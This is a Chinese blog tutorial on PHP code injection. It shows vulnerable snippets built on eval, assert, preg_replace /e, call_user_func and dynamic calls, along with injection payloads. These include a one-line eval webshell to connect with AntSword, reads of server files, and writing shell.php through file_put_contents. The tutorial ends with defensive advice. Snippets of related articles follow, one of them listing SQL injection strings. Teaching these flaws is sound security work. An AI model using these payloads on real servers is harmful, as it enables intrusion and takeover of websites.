PHP代码注入

最新推荐文章于 2022-06-26 08:37:41 发布
最新推荐文章于 2022-06-26 08:37:41 发布
阅读量1.5k 收藏 6
点赞数 1
文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zl52111/article/details/115771608
版权

1.大致介绍:
PHP代码执行注入(web方面)是指应用程序过滤不严格,用户可以通过请求将代码注入到应用中执行。代码执行类似于SQL注入漏洞。代码执行是可以把代码注入到应用中最终由服务器运行它,这样的漏洞如果没有特殊的过滤,相当于直接有了一个web后门的存在。

2.漏洞的危害:
可以通过代码执行漏洞继承web用户权限,执行任意代码。如果具有服务器没有正确配置,用户权限比较高的话,我们可以读写目标服务器的任意文件内容,甚至控制整个网站以及服务器。PHP中有很多函数和语句都会造成PHP
代码执行漏洞。

3.原因:
1.程序中含有可以执行的php代码的函数或者语言结构。
2.传入第一点的参数,客户端可控,可以直接修改或影响。

4.相关函数:

----eval()会将字符串当作php代码执行。

例如:  
		<?php
		if(isset($_REQUEST['code'])){
		@$str=$_REQUEST['code'];
		eval($str);
		}
		?>

---- 补充

  • //在url地址框上的最后要加上?code=phpinfo();
    //REQUEST:预定义超全局数组变量 包含GET POST COOKIE 传参
    //如果在url地址栏的后边加上code=${print(123456)};(也是同样可以执行的)
    code=1;phpinfo(); print(123456)(可以执行多条函数)

----assert()会将字符串当作php代码执行。

例如: 
		<?php
		if(isset($_REQUEST['code'])){
		@$str=$_REQUEST['code'];
		assert($str);
		}
		?>
		--直接让code=phpinfo() 就可以输出phpinfo()

----preg_replace() 对字符串进行正则处理

例如:
		<?php
		$str=preg_replace('/a/','b',"anhbadadb");
		echo $str
		?>
        --意思是在"anhbadadb"中搜索a 并用b来替换掉...

当第一个参数的值存在/e 修饰时 第二个参数 的值会被当作php代码来执行

 例如:
		 <?php
		if(isset($_GET['code'])){
		@$str=$_GET['code'];
		preg_replace("/\[(.*)\]/e",'\\1',$code);
		}
		?>
		--\\1代表正则第一此匹配的内容  code=[phpinfo()]  最后输出的是phpinfo界面

https://www.runoob.com/regexp/regexp-syntax.html–正则表达解析

----call_user_func()等函数

都有调用去他函数的功能,其中的一个参数作为要调用的函 数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。

以call_user_func()为例子,该函数的第一个参数作为回调函数,后面的参数作为回调函数的参数。

例如:
		<?php
		if(isset($_GET['fun'])){
		$fun=$_GET['fun'];
		$para=$_GET['para'];
		call_user_func($fun,$para);
		}
		?>
		--在url地址框中输入参数?fun=assert&para=phpinfo()  就会输出phpinfo()

----$a($b)动态函数

由于php的特性的原因,php的函数支持直接由拼接的方式调用,这直接导致了php的安全上的控制又加大了难度。不少知名程序也用到了动态函数的方法,这种写法跟使用call_user_func()的初衷一样,用来更加方便地调用函数,但是一旦过滤不严格就会造成代码执行漏洞。

例如:
		<?php
		if(isset($_GET['a'])){
		$a=$_GET['a'];
		$b=$_GET['b'];
		$a($b);
		}
		?>
		--  在url地址框输入?a=assert&b=phpinfo()  就会输出phpinfo()

5.代码执行漏洞的方式有很多:

---- 直接获取shell 例如:假如存在assert函数 有code参数 就可以利用一句话木code=@eval($_REQUEST[‘1’]) 可以使用蚁剑直接连接

-----获取文件的绝对路径 __FILE__(注意是双下划线)是php预定义常量,其含义是当前文件的路径。
例如:在url地址栏输入提交代码code=print(__FILE__)

----我们可以利用file_get_contents()函数读取服务器任意文件,前提是指导目标文件的路径和读取权限。
例如:
读取本地host文件
提交代码: ?code=var_dump或者是print(file_get_contents(‘c:\windows\systenm32\divers\etc\hosts’))

如果要查看当前文件的内容可以写入code=var_dump(file_get_contents(’./加上文件名’))

写入文件是file_put_contents函数  我们可以利用函数写入文件,前提是知道可写目录。

例如: 提交代码? code=var_dump(file_put_contents( P O S T [ ′ 1 ′ ] , _POST['1'], POST[1],_POST[‘2’]))
我们这时需要利用到hackbar 通过post方式提交参数:
1=shell.php&2=<?php phpinfo()?>
意思为创建一个shell.php文件 里面写入<?php phpinfo()?>

6.防御方法:

1.尽量不要使用eval等函数 eval是php当中的一种语言结构
2.如果使用的话一定要进行严格的过滤
3.preg_replace 放弃使用/e修饰符
4.disable_functions=assert(禁用掉assert函数) 就是在服务器端禁用

小亮酸Q糖
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP代码注入PHP代码注入漏洞
cc
03-06 6208
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
php注射库
FreeXploiT
10-24 1309
php注射库作者:swap类别:漏洞资料库发布日期:2004-06-28 14:45:43总浏览:46 or 1=1 or 1=1 /* %23 and password=mypass id=-1 union select 1,1,1 id=-1 union select char(9
PHP注入完整教程
hyshucom
06-09 286
在这个注入风靡的时代,多少菜鸟拿着工具四处冲锋.如果你不想成为工具的奴隶,不想遇到PHP就退避三舍,不想继续做着ASP的菜鸟之群,不 想......那么请你静下心来, 随我一同走完这次的入侵检测全过程.相信你必然能有所收获.不只在技术上,更在思路上,更在意识上..   判断是否存在注入:首先,PHP和ASP判断注入的方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即...
php注入教程,php注入实例
weixin_39972777的博客
03-10 218
php注入实例发布时间:2016-06-17 来源: 点击:次php注入实例在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期,下面说说我的休会吧,希望能抛砖引玉!相信大家对asp的注入已经是十分熟悉了,而对php注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而my...
PHP代码注入PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 7304
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
php代码注入+系统命令注入知识点总结.pdf
02-09
根据网上视频课程学习总计知识点,文档结构分为php代码注入和os代码注入 php代码注入从原理 相关语句函数 利用 防御方面做出总结 os系统命令注入从 原理成因 相关函数 利用 防御方面做出总结 整理为文档 可以方便...
网络安全笔记-99-渗透-PHP代码注入
wwxxee
01-21 622
PHP代码注入 原理及成因 是指应用程序(web方面)过滤不严格,用户可以通过请求将代码注入到应用中执行。代码注入类似于SQL注入漏洞,SQLi是将SQL语句注入到数据库中,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接由一个web后门的存在。 漏洞危害 代码执行漏洞可以继承web用户权限,执行任意代码。如果服务器没有正确配置,web用户权限比较高,则可以读写目标服务器任意文件内容,甚至控制整个网站以及服务器。PHP中有很多函数和语句都会造成PHP代码执行漏
360提供的php防sql注入代码修改类
05-02
本文将深入探讨360提供的PHP防SQL注入代码修改类,以及如何通过此类来防范这两种攻击。 一、SQL注入 SQL注入是一种利用网站应用程序的漏洞,通过输入恶意SQL语句来控制数据库的攻击手段。攻击者可以获取、修改、...
跟bWAPP学WEB安全(PHP代码)--PHP代码注入
weixin_30454481的博客
01-09 288
---恢复内容开始--- 背景 今天我们换一个方式来分析这个漏洞,从渗透的角度去搞。 渗透过程 测试漏洞 先来看看,观察URL是:http://192.168.195.195/bWAPP/phpi.php message像是有链接,点击看看 在查看url是http://192.168.195.195/bWAPP/phpi.php?message=test,GET型参数,burp扫一下...
PHP注入工具
07-17
PHP注入工具 注入地址,检测注入 网站地址浏览
052 php代码注入
鸡蛋炒鸡蛋
03-10 2150
文章目录一:RCE概念二:PHP代码注入原理以及成因三:漏洞的危害四:相关的函数和语句4.1:eval()4.2:assert()4.3:preg_ 一:RCE概念 RCE:远程代码执行 英文全称:remote command/code execute     二:PHP代码注入原理以及成因 PHP代码执行(注入)(web方向)是指应用程序过滤不严,用户可以通过请求将代码注入到应用中执行。代码执行类似于SQL注入漏洞。sqli是将sql语句注入到数据库中执行,而代码执行则是可以把代码注入
笔记-代码注入PHP
居上
10-25 260
笔记-代码注入代码执行(注入)原因条件相关函数和语句直接获取shell防御方法 代码执行(注入) CE(代码执行) RCE(远程代码执行) 原因 Web方面:是指应用程序过滤不严,用户可以通过请求将代码注入到应用程序中执行。代码执行(注入)是将代码注入到应用程序中,最终由服务器运行它。这样的漏洞如果没有特殊过滤,相当于有一个Web后门的存在。 条件 1.程序中含有可以执行PHP代码函数或者语言结构 2.传入第一个点中的参数,客户端可控,直接修改或者影响 相关函数和语句 eval():会将字符串当
PHP代码注入基础
lhix_的博客
11-30 754
PHP代码注入基础漏洞原因相关函数及语句evalassertpreg_replacecall_user_fun动态函数`$a($b)`漏洞应用OS命令注入命令执行的常见函数systemexecshell_execpassthru反引号``漏洞利用 漏洞原因 漏洞原因:程序中有可执行的PHP代码函数或语言结构,传入的参数客户端可以进行控制。 相关函数及语句 eval eval(); 会将字符串当作PHP代码执行。 例: <?php $_str=$_GET['code']; eval($str); ?&
php远程文件包含攻击,PHP安全编程:文件包含的代码注入攻击
weixin_35668158的博客
03-10 178
一个特别危险的情形是当你试图使用被污染数据作为动态包含的前导部分时:include "{$_GET['path']}/header.inc";?>在这种情形下攻击者能操纵不只是文件名,还能控制所包含的资源。由于PHP默认不只可以包含文件,还可以包含下面的资源(由配置文件中的allow_url_fopen所控制):include 'http://www.google.com/';?>in...
PHP Object Injection(PHP对象注入
Bendawang's Blog
03-18 4781
PHP Object Injection(PHP对象注入
php注入代码,PHP依赖注入(代码全篇)
weixin_42392689的博客
03-09 180
依赖注入传统的思路应用程序用到一个Foo类,就会创建Foo类并调用Foo类的方法。假如这个方法内需要一个Bar类,就会创建Bar类并调用Bar类的方法。而这个方法内需要一个Bim类,就会创建Bim类,接着做些其它工作。/*** Foo*/class Foo{public function doSomething($value=''){# code...$Bar = new Bar();$Bar-...
PHP代码审计(三)------代码执行注入
wkend的博客
04-05 799
eval代码执行函数 /** isset()函数: 检测变量是否设置,并且不是 NULL。 如果已经使用 unset() 释放了一个变量之后,它将不再是 isset()。若使 用 isset() 测试一个被设置成 NULL 的变量,将返回 FALSE。同时要注意 的是一个 NULL 字节("\0")并不等同于 PHP 的 NULL 常数。 */ if(isset($_GET['str'...
php的依赖注入
weixin_43740552的博客
05-21 304
什么是依赖注入? 依赖注入就是不是我自身的,却是我需要的,也是我所依赖的。 class Boy { private $girl; public function __construct(Girl $girl) { $this->girl = $girl; } } class Girl{} //这里的Boy类就强依赖Girl $boy = new Boy(new Girl(...
PHP代码注入与系统命令注入知识点总结
PHP代码注入和系统命令注入知识点总结 PHP代码注入是一种常见的Web应用漏洞,它允许攻击者将恶意代码注入到Web应用中执行,从而导致严重的安全问题。为了防止这种漏洞,需要了解PHP代码注入的原理、成因、相关函数...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值